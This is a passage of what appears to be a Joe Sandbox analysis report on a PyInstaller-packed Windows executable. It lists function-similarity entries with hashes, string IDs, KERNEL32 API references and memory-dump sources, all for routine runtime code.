                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction ID: f9bf8b7b704f7107f9305663a7eec017aadffaf8da79c1e39107c88bd79daa05
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE218E62B0CB419AE710BB54F8967AA73A4FB88784F404136EE8D97B59EF3CD245C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF644871B99), ref: 00007FF644872760
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                • Instruction ID: f1062883099410325f6b43604b6ad7cfd12f1d3260681a5ed22c0c0078e9b403
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F216D32B1CB8186E720FB50B8927E66294BB88784F400135EE8C93A59DF7CD2458740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction ID: 40577bb7c6bfeb44d1998746ff6c2b4668a3fe741a893451acfb609e52a2faeb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F06261B0DB06C5EA10BB24E4C637A6360BF85761F540235DE6E866ECDF6DD484D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction ID: 2a3cb33d07c6d7ce1eacf8864a87d6596df5df05675b3a989bba9e6b98e5f527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4118222E5CE03CAFA64356DE4D33791250AF59360E081634EE6ED67EECE6FE8815100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3AF
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3CE
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3F6
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B407
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B418
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                • Instruction ID: 99f5a9e2c2bbc384b88379fd951a1a590d0538946315b72c276934a069b0bbb4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF113A20F0D64289FA58B72599D327921815FC47B0F488734EE7ED66DEDE2CF8428301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                • Instruction ID: ac01e6505b14a9b000f88cec93a8ad75612aa772c9034d967890d4e6e7cc83bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60119320E4D2078DF969B36558D717A21424FC5771F184B34EE3EDA6DBDE2CF8418211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction ID: 1f674e9f8a991638cdd11a2d3807376ee97b4782cdb607caecd41c26ae368c00
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A291CF22A0CA4689FB61BE24D49277D37A1AF40B94F444936DE5DE73DAEF3CE8458301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction ID: 89d22a8eaef4cfcf86cb4a76e77747351a330e24ebd7da863516a121a4618b7c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC818972E0C2538DE775BE29818227936A1AF11B88F558035DF09DB28FDF2DE9029301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                • Instruction ID: 9ac13814da8063900a28e86598f13c1da37cfc9eee31346957f08f3bb5c07527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04518C26B1D6028EDB14BB15E8A5A7873E1EB44B98F148136DE4E8778CEF7CE841C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                • Instruction ID: bf69efbd19a559e2910b02a1546d6312629e44a9c7fc2dbbe2e400cd7e00b4a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71617532A0CBC589E761BB15E8913A9B7A0FB95794F044225EF9C47B5ADF7CD190CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction ID: 78056e1bd39a6ad11124c5a0210f35a5339a81971ac2f6d7ea45a5918c4d0b4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51517D32B0C6428EEB64BB2698E626877A4FB55B84F144136DF5D87B9ACF3CE450C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF64487352C,?,00000000,00007FF644873F1B), ref: 00007FF644877F32
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                • Instruction ID: 570cc693dccab748ba75edfcd3add18504b94ead668c671b8dee13190dde80b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C31872171DAC149FA61BB11ECA17AA6294FB84BE4F440231EE6D87BCDDE2CE645C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction ID: 5ef64e4ba75940d2785d09b4e2bd5248f874b82a868590e140cf925209afb576
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80217F62B0CB4196E710BB54B8967AA63A4FB88784F404136EE8D97659EF3CD245C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction ID: eed41a1321574293fa4bb704efeaa59c7f01b00ccf3a77dafb9d5160e58d5464
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23D1E172B1CA818DE711EF69D4812AC37A1FB65B98B444236DE5ED7B8DDE38D41AC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction ID: c3c9967bac5b45d08fd19d6a38c68faefe2a287d065003f59dee31030e702ab2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED51A672F085118EEB14FF6499E66BC2765AF54369F500235DE1E92AEADF3CE442C600
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
